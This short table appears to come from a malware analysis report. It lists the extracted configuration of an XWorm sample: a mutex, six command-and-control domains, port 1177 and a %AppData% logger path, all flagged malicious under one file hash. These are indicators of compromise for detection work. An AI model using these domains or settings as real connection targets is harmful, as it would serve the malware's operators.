| LoggerPath | %AppData% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | gE9xESzegqeoqtdM Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | suitingwarriors.org Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | student56.ru.com Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | devyus.in.net Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | mjnd.sa.com Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | kshxfr.sa.com Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| CnC | nrafth.za.com Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |
| Port | 1177 Malicious |
2c26b6f05631d3bccdd211e7dc0486cb |